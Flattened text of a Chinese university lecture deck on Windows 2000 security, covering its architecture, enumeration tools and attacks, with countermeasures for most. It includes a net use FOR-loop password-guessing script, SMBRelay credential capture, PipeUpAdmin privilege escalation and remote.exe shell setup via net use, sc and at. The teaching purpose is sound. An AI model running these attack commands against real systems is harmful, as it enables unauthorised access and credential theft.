资源描述
Click to edit Master title style,Click to edit Master text styles,Second level,Third level,Fourth level,Fifth level,*,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,*,Win2k系统安全(1),胡建斌,北京大学网络与信息安全研究室,E-mail:hjbin,录,Win2K安全架构,针对Win2K安全扫描,针对Win2K攻击,第2页,Win2K安全架构,第3页,Win2K安全子系统,Windows NT设计从最初就考虑了安全问题:取得了TCSEC C2认证,这在竞争激烈商业操作系统市场中是一个不错业绩,Windows 正处于一个类似标准评定过程中,使用通用标准(Common Criteria,CC),为了取得更高级别(B级),Windows 需要在它设计中融入一些关键元素,包含(但不限于):,用于认证安全登录工具,可自由设定访问控制,审核,Windows 经过它安全子系统实现了这些功效。图2.1显示了Windows 安全子系统,第4页,SRM,(Security Refrence Monitor),第5页,SRM,处于内核模式,监视用户模式中应用程序代码发出资源访问请求并进行检验,全部安全访问控制应用于全部安全主体(security principle),第6页,安全主体,用户,组,计算机,第7页,用户帐户,账户是一个参考上下文,操作系统在这个上下文描述符运行它大部分代码。换一个说法,全部用户模式代码在一个用户账户上下文中运行。即使是那些在任何人都没有登录之前就运行代码(比如服务)也是运行在一个账户(特殊当地系统账户SYSTEM)上下文中,假如用户使用账户凭据(用户名和口令)成功经过了登录认证,之后他执行全部命令都含有该用户权限。于是,执行代码所进行操作只受限于运行它账户所含有权限。恶意黑客目标就是以尽可能高权限运行代码。那么,黑客首先需要“变成”含有最高权限账户,第8页,系统内建帐户,第9页,用户帐户攻击,当地Administrator或SYSTEM账户是最有权力账户,相对于Administrator和SYSTEM来说,全部其它账户都只含有非常有限权限,所以,获取Administrator或SYSTEM账户几乎总是攻击者最终目标,第10页,组,组是用户账户集合一个容器,Windows 含有一些内建组,它们是预定义用户容器,也含有不一样级别权限,放到一个组中全部账户都会继承这些权限。,最简单一个例子是当地Administrators组,放到该组中用户账户含有当地计算机全部权限,第11页,系统内建组,第12页,域中组,当Windows 系统被提升为域控制器时,同时还会安装一系列预定义组,权限最高预定义组包含域管理员(Domain Admins),它含有域中全部权限,还有企业管理员(Enterprise Admins),它含有域森林全部权限,第13页,域内建组,第14页,组攻击,当地Administrator或SYSTEM账户是最有权力账户,当地Windows 系统中当地Administrators组是最有吸引力目标,因为这个组组员继承了相当于管理员权限,Domain Admins和Enterprise Admins是Windows 域中最有吸引力目标,因为用户账户加入到它们当中后将会提升为含有域中全部权限,相对于Administrators、Domain Admins和Enterprise Admins,全部其它组都只含有非常有限权限,获取Administrators、Domain Admins和Enterprise Admins组中账户几乎总是攻击者最终目标,第15页,特殊用户,Windows NT/含有一些特殊身份,它们是处于特定传输状态账户(比如经过网络登录)或来自于特定位置账户(比如在键盘上进行交互式登录)容器,这些身份能够用来调整对资源访问控制。比如,NT/中对特定进程访问受限于INTERACTIVE(交互)用户,第16页,特殊用户,第17页,SAM,(Security Accounts Manager),在独立Windows 计算机上,安全账户管理器负责保留用户账户名和口令信息,口令经过,散列并被加密,,现有技术不能将打乱口令恢复(尽管如此,散列口令是能够被猜出),SAM组成了注册表5个配置单元之一,它在文件,%systemroot%system32configsam,中实现,在Windows 域控制器上,用户账户和散列数据保留在活动目录中(默认为,%systemroot%ntdsntds.dit,)。散列是以相同格式保留,不过要访问它们必须经过不一样方法,第18页,SYSKEY,从NT4 Service Pack 3开始,Microsoft提供了对SAM散列进行深入加密方法,称为SYSKEY,SYSKEY是System KEY缩写,它生成一个随机128位密钥,对散列再次进行加密(不是对SAM文件加密,而是对散列),为了启用SYSKEY,你必须运行,SYSKEY,命令,,第19页,SYSKEY,第20页,森林、树、域,作用域,信任,边界管理,第21页,域,经过将一台或几台Windows 服务器提升为域控制器,就能够很轻易地创建Windows 域,域控制器(Domain Controller,DC)是共享域信息安全存放仓库,同时也作为域中认证中央控制机构,域定义了共享账户一个分布边界。域中全部系统都共用一组账户。在NT中,共享域信息从主域控制器(Primary DC,PDC)向备份域控制器(Backup DC,BDC)进行复制,称为单主机复制,在Windows 域中,全部域控制器都是对等,它们之间进行域信息复制称为多主机复制,第22页,树和森林,因为Windows 活动目录实现,域已经不再像NT中那样是逻辑上管理边界,在活动目录层次中,在域之上还存在“树”和“森林”结构,树在很大程度上只是命名上约定,没有太多安全上含义,不过森林划分了Windows 目录服务边界,它是管理控制根本界限,第23页,第24页,作用域,第25页,信任关系,Windows 能够在域间形成信任关系。信任关系只是创建了域间隐含访问能力,不过并没有显式地启用,信任能够是单向或双向。单向信任意味着一个域信任另一个域,反过来不存在信任。双向信任定义了两个域之间相互信任。单向信任通惯用于允许一个域中管理员定义对所在域访问控制规则,而相反则不行,第26页,信任关系,信任能够是可传递和不可传递。可传递信任意味着假如域A传递信任域B,而域B传递信任域C,则域A就传递信任域C,在默认情况下,Windows 森林中全部域之间都存在可传递、双向信任,Windows 能够对森林外域或NT4域建立单向、不可传递信任,第27页,安全边界,因为森林中各个域之间自动建立双向可传递信任,造成了能够分配森林中各个域权限通用组存在,同一森林中其它域管理员有夺取活动目录Configuration容器全部权并对其进行修改潜在能力。这种修改将会在森林中全部域控制器上传输。于是,对于任何加入到该森林域来说,你必须确保该域域管理员能够像其它域管理员一样可信,Windows 森林内部实际安全边界是,森林,第28页,域入侵威胁,假设一个黑客占领了一个域控制器,森林中其它域都含有潜在危险,因为森林中任何域Domain Admins都能够获取活动目录Configuration容器全部权并修改其中信息,并能够将对该容器修改复制到森林中其它域控制器上,假如任何外部域账户在被攻入域进行认证,那么攻击者能够经过LSA口令缓存来偷取这些账户口令,这使得他影响扩大到森林中其它域,假如根域被攻入,那么Enterprise Admins和Schema Admins组组员能够对森林中全部域进行全方面控制,除非在此之前你已经手动限制了这些组权限,第29页,SID,第30页,SID,Window NT/内部对安全主体操作是经过一个称为安全标识符(Security Identifier,SID)全局惟一48位数字来进行,SID能够预防系统未来自计算机AAdministrator账户与来自计算机BAdministrator账户弄混,第31页,SID,S-1-5-21-1507001333-1204550764-1011284298-500,SID带有前缀S,它各个部分之间用连字符隔开,第一个数字(本例中1)是修订版本编号,第二个数字是标识符颁发机构代码(对Windows 来说总是为5),然后是4个子颁发机构代码(本例中是21和后续3个长数字串)和一个相对标识符(Relative Identifier,,RID,,本例中是500),第32页,SID生成,SID中一部分是各系统和域惟一含有,而另一部分(,RID,)是跨全部系统和域共享,当安装Windows 时,当地计算机会颁发一个随机SID。类似,当创建一个Windows 域时,它也被指定一个惟一SID。于是,对任何Windows 计算机或域来说,子颁发机构代码总是惟一(除非有意修改或复制,比如一些底层磁盘复制技术),第33页,RID,RID对全部计算机和域来说都是一个常数。比如,带有RID 500SID总是代表当地计算机真正Administrator账户。RID 501是Guest账户,在域中,从1000开始RID代表用户账户(比如,RID 1015是在该域中创建第14位用户),Windows(或者使用适当工具恶意黑客)总是将含有RID 500账户识别为管理员,第34页,其它SID,S-1-1-0Everyone,S-1-2-0Interactive用户,S-1-3-0Creator Owner,S-1-3-1Creator Group,第35页,为何不能总是使用Administrator登录,C:,net use 192.168.234.44ipc$password/u:Administrator,System error 1326 has occurred.,Logon failure:unknown user name or bad password.,第36页,Windows会自动将当前登录用户凭据提交给网络登录企图,假如用户在客户端上是使用Administrator登录,这个登录企图就会被解释为客户端希望使用当地Administrator账户登录到远程系统,当然,这个账户在远程服务器上没有上下文,你能够使用net use命令来手动指定登录上下文,给出远程域、计算机名称或IP地址和用户名,并在用户名前加上反斜线,比如:,C:,net use 192.168.234.44ipc$password/u:domainAdministrator,The command completed successfully.,第37页,查看SID,C:user2sid Administrator,S-1-5-21-1507001333-1204550764-1011284298-500,Number of subauthorities is 5,Domain is CORP,C:sid2user 5 21 1507001333 1204550764 1011284298 500,Name is Administrator,Domain is CORP,Type of SID is SidTypeUser,第38页,认证、授权和审核,令牌,网络认证,审核,第39页,登录认证过程,首先,Windows 必须确定自己是否在与正当安全主体打交道。这是经过认证实现,最简单例子是经过控制台登录到Windows 用户。用户按下标准,CTRL+ALT+DEL,组合键以打开Windows 安全登录窗口,然后输入,账户名称和口令,。安全登录窗口将输入凭据传递给负责验证用户模式组件,如Winlogon和LSASS。假设凭据是有效,Winlogon将创建一个,令牌,(或称访问令牌),并将之,绑定,到用户登录会话上,稍后访问资源时需要提供令牌,第40页,令牌,令牌中含有与用户账户相关全部SID,包含账户SID,还有该用户所属全部组和特殊身份(如Domain Admins和INERACTIVE)SID,能够使用whoami这么工具(包含在Windows Resource Kit中)来查看与登录会话相关SID,第41页,第42页,第43页,网络认证挑战/应答,服务器向客户端发出一个随机值(挑战),客户端使用用户口令散列对它进行加密散列函数运算,并将这个新计算出值(应答)传回服务器,服务器从当地SAM或活动目录中取出用户散列,对刚发送质询进行散列运算,并将结果与客户端应答相比较,于是,在Windows NT/认证过程中,没有口令经过网络传输,即使是以加密形式也没有,第44页,第45页,Win2K支持认证方法,第46页,审核,审核策略:即需要统计哪些事件,LSASS在系统引导时以及策略修改时将审核策略传递给安全参考监视器SRM,SRM和Windows 对象管理器一起生成审核统计,并将它们发送给LSASS,LSASS添加相关细节(进行访问账户SID等等)并将它们提交给事件日志服务,由后者统计到安全日志中,第47页,第48页,目 录,Win2K安全架构,针对Win2K安全扫描,针对Win2K攻击,第49页,扫描工具,Ping,小榕流之光,NetScanTools Pro(NSTP),SuperScan,View,Nbtstat,Nbtscan,netviewx,第52页,DNS查找工具,Net view,Nslookup,Nltest,第53页,共享资源查找工具,DumpSec,enum,Nete,第54页,SID查找工具,user2sid,Sid2user,userinfo,Userdump,GetAcct,第55页,SNMP查找工具,snmputil,Solar Winds,第56页,活动目录查找工具,ldp,Solar Winds,第57页,对策,在网络或主机级别上,禁止对TCP和UDP端口135139和445访问,禁用SMB服务,将RestrictAnonymous设置为2,SMB(Server Message Block,局域网上提供共享文件和打印机协议),第58页,禁用139端口,在当地连接属性窗口中,打开Internet Protocol(TCP/IP)属性,然后选择Advanced|WINS标签,有一个选项称为Disable NetBIOS over TCP/IP,如图所表示,第59页,禁用SMB,多数用户可能会认为禁用了TCP/IP上NetBIOS就已经成功地禁止了对他们计算机SMB访问。这是错误。这个设置只是禁用了NetBIOS会话服务,即TCP端口139,Windows 在TCP 445上运行了另一个SMB监听程序。系统版本高于NT4 Service Pack 6aWindows SMB客户端在试图与TCP 139建立连接失败后,会自动转向TCP 445,所以空会话依然能够被客户建立,即使TCP 139已经禁用或阻塞,第60页,禁用445端口,打开Network and Dial-up Connections(网络和拨号连接),选择Advanced菜单中Advanced Settings(高级设置),然后在适当适配器上取消对File and Printer Sharing for Microsoft Networks(Microsoft网络文件和打印机共享)选择,如图所表示,第61页,第62页,禁用SNMP,删除SNMP代理,配置为只对特定IP地址作响应,第63页,配置为只对特定IP地址作响应,在使用惟一一台管理工作站轮询全部设备SNMP数据环境中,这是一个经典配置,打开Services MMC|SNMP Service Properties对话框|Security标签,选择Accept SNMP packets from these hosts单项选择按钮,并指定你SNMP管理工作站IP地址,如图所表示,第64页,第65页,第66页,第67页,目 录,Win2K安全架构,针对Win2K安全扫描,针对Win2K攻击,第68页,针对Win2K攻击,SMB攻击,权限提升,取得交互,扩大影响,去除痕迹,第69页,攻击伎俩,猜测用户名和密码,获取密码散列,利用脆弱网络服务或客户端,获取对系统物理访问,第70页,SMB攻击,猜测SMB密码,窃听SMB认证,第71页,攻击前准备工作,关闭与目标之间空连接,回顾扫描结果,防止账户锁定,管理员主要性,第72页,关闭与目标之间空连接,因为NT/不支持同时使用不一样凭据进行连接,我们必须使用net use/delete命令注销现有与目标之间全部空会话(使用/y参数能够使连接关闭而不用进行提醒):,C:,net use*/d/y,第73页,回顾扫描结果,试验室或测试账户,在你环境中存在多少这么账户?其中有多少个位于当地Administrators组中?你是否知道这么账户密码通常是什么,在注释字段中带有丰富信息用户账户,经过查点获取信息,见到过在这个字段中以明文形式写出密码。那些不愿意记住复杂密码“不幸”用户经常在注释字段中有很多提醒,其有利于密码猜测,Administrators组或Domain Admins组组员,这些账户通常是攻击者目标,因为它们拥有当地系统或域至高无上权限。同时,使用Microsoft默认工具不能锁定当地Administrator账户,这使得它成为连续密码猜测攻击目标,第74页,回顾扫描结果,共享组账户,大多数组织都倾向于在给定环境中大部分系统上重用账户凭据。比如类似于backup(备份)或admin(管理)这么账户名称。这些账户密码通常都比较轻易猜测,最近一定时期内没有修改过密码账户,这通常表明用户和系统管理员对账户维护工作不重视,有可能造成潜在危险。这些账户也可能会使用在创建该账户时指定默认密码,这是很轻易猜出(通常会使用单位名称,或者是Welcome(欢迎)等单词),最近一定时期内没有登录过账户,一样,使用频率很低账户也是维护工作疏忽所造成,它们密码通常也比较轻易猜出,第75页,防止账户锁定探测锁定,阈,值,Enum p,Guest帐户猜测,在Windows 上,Guest账户在默认情况下是被禁用,不过假如你到达了锁定阈值,你依然能够收到提醒,第76页,Guest猜测,C:,net use ipc$*/u:guest,Type the password for mgmgrandipc$:,System error 1326 has occurred.,Logon failure:unknown user name or bad password.,C:,net use ipc$*/u:guest,Type the password for mgmgrandipc$:,System error 1909 has occurred.,The referenced account is currently locked out and may not be logged on to.,第77页,Guest猜测,在猜测Guest(或其它账户)密码时,需要注意另外一件事是假如你确实猜对了一个已经被禁用账户密码,那么将会出现另一个不一样错误消息:,C:,net use ipc$*/u:guest,Type the password for mgmgrandipc$:,System error 1331 has occurred.,Logon failure:account currently disabled.,在Windows 中,Guest账户密码默认为空。于是,假如你连续地以空密码来猜测Guest账户,那么永远也不会到达锁定阈值(除非密码被人为修改过),第78页,开始攻击,猜测SMB密码,第79页,手工SMB密码猜测,C:,net use ipc$,password,/u:,username,System error 1326 has occurred.,Logon failure:unknown user name or bad password.,第80页,可能用户名密码组合,第81页,使用For循环字典攻击,创建字典,C:,echo,credentials.txt,administrator,administrator password,administrator administrator,第82页,使用For循环字典攻击,猜测,C:,FOR/F tokens=1,2*%i in(credentials.txt),More?,do net use IPC$%j/u:%i,More?,2nul,More?,&echo%time%date%outfile.txt,More?,&echo acct:%i pass:%j outfile.txt,第83页,使用For循环字典攻击,查看猜测结果,C:,type outfile.txt,11:53:43.42 Wed 05/09/,acct:,administrator,pass:,第84页,自动攻击工具,NAT,SMBGrind,Fgrind,第85页,对策,实施密码复杂性要求,账户锁定,启用登录失败事件审核,查看事件日志,锁定真正Administrator账户并创建一个假目标,禁用闲置账户,仔细核查管理人员,第86页,实施密码复杂性要求,第87页,账户锁定,第88页,启用登录失败事件审核,第89页,查看事件日志,来自Foundstone企业NTLast,来自Foundstone企业VisualLast,来自TNT Software企业事件日志监视器(ELM),来自Aelita Software企业EventAdmin,第90页,锁定真正Administrator账户,NT4 Resource Kit中提供了一个称为passprop工具,Windows 上运行admnlock只能工作在安装了SP2或更高系统上,而且只有在系统或域设置了账户锁定阈值之后才会发生作用,要使用admnlock在网络中锁定真正Administrator账户,运行以下命令:,C:,admnlock/e,The Administrator account may be locked out except for interactive,logons,第91页,查看事件日志,来自Foundstone企业NTLast,来自Foundstone企业VisualLast,来自TNT Software企业事件日志监视器(ELM),来自Aelita Software企业EventAdmin,第92页,禁用闲置账户,第93页,开始攻击,窃听SMB认证,第94页,窃听方法,直接从网络电缆上嗅探SMB凭据,使用坑骗性服务器捕捉SMB凭据,中间人(Man-in-the-middle,MITM)攻击,第95页,LAN Manager口令散列,微软在Windows NT 和 系统里缺省安装了LAN Manager口令散列,因为LAN Manager使用加密机制比微软现在方法脆弱,LAN Manager口令能在很短时间内被破解。即使是健壮口令散列也能在一个月内破解掉,第96页,LAN Manager口令散列机制,长口令被截成14个字符,短口令被填补空格变成14个字符,口令中全部字符被转换成大写,口令被分割成两个7个字符片断,第97页,LAN Manager口令散列机制,LM算法是从账户密码两个独立7个字符分段创建用户散列,前8个字节来自于用户密码前7个字符,随即8个字节来自于密码第814个字符,第98页,LAN Manager口令散列机制,每块都能够经过对全部可能8字节组合进行穷举攻击而猜出,攻击全部8字节“字符空间”对于当代桌面计算机处理器来说是很轻松事情,假如攻击者能够发觉用户LM散列,那么他们最终破解得到实际明文密码就很可能了,第99页,L0phtcrack,第100页,L0phtcrack不足,只能从共享介质中捕捉质询-应答通信,当前还不能从两个Windows 系统间登录交换中获取散列,经过网络监听破解质询-应答散列所需时间伴随添加密码散列数量而线性增加,在使用SMBCapture之前,WinPcap v2.1报文捕捉驱动程序必须成功安装和运行,当前还不能从NTLMv2质询-应答通信中得到散列,第101页,坑骗,将SMB登录重定向到攻击者,假设攻击者能够坑骗用户连接到他所指定SMB服务器上去,捕捉LM应答就变得轻易多,L0phtcrack早期版本中曾经提议了一个最基本坑骗方法:向目标用户发送一封电子邮件,其中嵌入假冒SMB服务器超级链接。用户收到这封邮件,单击超级链接(手动或自动),客户端会在不受注意情况下将该用户SMB凭据经过网络发送,这么超级链接很轻易伪装,而且通常只需要与用户进行极少交互,因为假如没有明确提供其它认证信息话,Windows会自动尝试以当前用户身份登录,第102页,对策,确保恪守网络安全最正确操作准则。在受到保护网络中使用SMB服务,确保全部网络基础设施不允许SMB通信抵达不受信任结点上,配置网络中全部Windows系统,禁止LM散列在网络中传输,第103页,禁止发送LM散列,第104页,使用SMBRelay捕捉SMB认证,第105页,SMBRelay,SMBRelay实际上是一个SMB服务器,它能够从到来SMB通信中搜集用户名和密码散列,顾名思义,SMBRelay不但能够实现虚假SMB终端功效在特定情况下,它还能够进行中间人(man-in-the-middle,MITM)攻击,第106页,建立假SMB服务器,C:,smbrelay/E,SMBRelay v0.992?TCP(NetBT)level SMB man-in-the-middle relay attack,Copyright:Sir Dystic,Cult of the Dead Cow,Send complaints,ideas and donations to sirdystic,2 ETHERNET CSMACD?3Com 10/100 Mini PCI Ethernet Adapter,1 SOFTWARE LOOPBACK?MS TCP Loopback interface,第107页,开启假SMB服务器,C:,smbrelay/IL 2/IR 2;在序号为2网络接口上建立,SMBRelay v0.992?TCP(NetBT)level SMB man-in-the-middle relay attack,Copyright:Sir Dystic,Cult of the Dead Cow,Send complaints,ideas and donations to sirdystic,Using relay adapter index 2:3Com EtherLink PCI,第108页,等候并捕捉SMB连接,Connection from 192.168.234.44:1526,Request type:Session Message 137 bytes,Username:administrator,Domain:CAESARS-TS,OS:Windows 2195,Lanman type:Windows 5.0,Password hash written to disk,第109页,第110页,第111页,权限提升,命名管道预测,NetDDE,第112页,权限提升,权限提升通常是指提升当前用户账户能力,到达含有更高权限账户,通常是超级用户,比如Administrator或SYSTEM过程,从恶意黑客角度来说,获取一个普通账户,然后进行权限提升攻击,比远程进行攻击直接获取超级用户权限要轻易得多,不论在哪种情况下,不论他到达了什么特权级别,经过认证攻击者都比未经过认证时要有很多到达目标选择,第113页,命名管道预测,Guardent研究员发觉,Windows 在使用命名管道时存在一个漏洞,这个漏洞允许任何交互式登录用户模仿SYSTEM账户,并使用该账户权限运行任意程序,Windows 使用可预测命名管道用于经过服务控制管理器(Service Control Manager,SCM)控制服务,第114页,命名管道预测,SCM使用一个惟一命名管道用于它开启每个服务进程间通信。这个命名管道格式是:,.pipenetNtControlPipe12;,其中12是管道编号。,经过读取注册表主键,HKLMSYSTEMCurrentControlSetControlServiceCurrent,攻击者能够预测下一个命名管道将是,.pipenetNtControlPipe13,第115页,命名管道预测攻击,命名管道预测攻击利用管道编号这种可预测性,它在SCM创建同名管道之前先创建这个管道,当一个新服务开启时,它将连接到这个恶意管道,经过命令SCM开启任意一个服务,通常是以含有高度特权账户运行服务,SCM将该服务连接到恶意管道上去。恶意管道于是就能够模仿该服务安全上下文,作为SYSTEM身份或该服务所在任意账户身份执行命令,第116页,PipeUpAdmin,PipeUpAdmin能够将当前用户账户添加到当地Administrtors组中,下面例子将说明这一点,这个例子假设用户wongd已经经过了认证,能够交互地访问命令控制台,wongd是Server Operators组一位组员,第117页,PipeUpAdmin攻击,首先,wongd对全体当地Administrators组组员进行检验,C:,net localgroup administrators,Alias nameadministrators,Comment Administrators have complete and unrestricted,access to the computer/domain,Members,-,Administrator,The command completed successfully.,第118页,PipeUpAdmin攻击,下一步,wongd试图将自己添加到Administrators组中,但收到了一条拒绝访问错误消息,因为不含有足够权限,C:,net localgroup administrators wongd/add,System error 5 has occurred.,Access is denied.,第119页,PipeUpAdmin攻击,执行pipeupadmin,C:,pipeupadmin,PipeUpAdmin Maceo,maceo,(C)Copyright-,The ClipBook service is not started.,More help is available by typing NET HELPMSG 3521.,Impersonating:SYSTEM,The account:FS-EVILwongd has been added to the Administrators group.,第120页,PipeUpAdmin攻击,检验身份,C:,net localgroup administrators,Alias nameAdministrators,CommentAdministrators have complete and unrestricted access to,the computer/domain,Members,-,Administrator,wongd,The command completed successfully.,第121页,PipeUpAdmin攻击,退出并重新登录,获取administrator组用户权限,很多权限提升攻击都需要这个过程,因为Windows 需要重新创建当前用户访问令牌,方便加入新组组员关系SID,第122页,作为SYSTEM身份运行NetDDE,年2月,stakeDildog发觉了Windows 2000网络动态数据交换服务(Network Dynamic Data Exchange Service,NetDDE)中一个漏洞,这个漏洞允许当地用户以SYSTEM特权运行任意命令,NetDDE是使应用程序经过“受信任共享”来共享数据一个技术。经过受信任共享,能够发出请求执行应用程序,并运行在SYSTEM账户上下文中,第123页,第124页,取得交互,命令行控制,GUI控制,第125页,交互方式,一旦攻击者获取了对Windows 系统管理访问,几乎没有什么方法能够阻止他 将带来损害。极少有攻击者会满足于他所取得“管理”成就并满意地离开。相反,他总会深入企图获取交互式控制,交互控制是查看系统内部工作状态并任意执行命令能力,就像物理上坐在系统前面一样。在Windows世界中,这能够经过两种方式之一来实现:经过命令行界面,比如类似于telnet连接,或者经过图形化界面,比如PCAnywhere、Microsoft终端服务器或其它类似远程控制产品,当然,攻击者不会希望使用这种重量级技术,他们需要是小、易于隐藏控制方法,第126页,命令行控制,Remote.exe,Net use,netcat,第127页,Remote.exe,remote.exe来自于Windows NT/Resource Kit,remote.exe能够运行于服务器模式或客户端模式,要使用remote.exe获取目标Windows系统命令行控制,你必须进行以下步骤操作:,第128页,Remote.exe,1.,与目标之间创建管理连接:,C:,net use 10.1.1.5ipc$password/u:administrator,2.,将一个驱动器映射到管理共享C$:,C:,net use*10.1.1.5c$,Drive D:is now connected to 10.1.1.5c$.,The command completed successfully.,第129页,Remote.exe,3.将remote.exe复制到目标上一个目录中:,C:,copy remote.exe d:winntsystem32,4.调用sc命令开启计划任务服务:,C:,sc 10.1.1.5 start schedule,5.确定远程系统上时间:,C:,net time,10.1.1.5,6.使用at命令开启remote.exe程序,运行为服务器模式:,C:,at 10.1.1.5 2:12A 摂remote/s cmd hackwin“”,第130页,Remote.exe,7.检验是否已经经过at命令开启了remote.exe程序:,C:,at 10.1.1.5,Status IDDayTimeCommand Line,-21Today2:12 AMremote/s cmd hackwin,8.以客户端模式运行remote.exe程序,连接到目标系统:,C:,remote/c 10.1.1.5 hackwin,第131页,扩大影响,确定审核,密码提取,密码破解,文件搜索,GINA木马,嗅探,跳板,端口重定向,第132页,确定审核,Windows审核能够在事件日志或syslog中统计下特定事件,以审查历史。日志甚至能够用来触发向系统管理员发出寻呼警告或电子邮件,所以,确定审核状态通常是帮助了解黑客在系统上所能够停留时间不错方法,auditpol,第133页,auditpol,C:,auditpol 10.1.1.5,Running,(X)Audit,Enabled,System=Success and Failure,Logon=Failure,Object Access=
展开阅读全文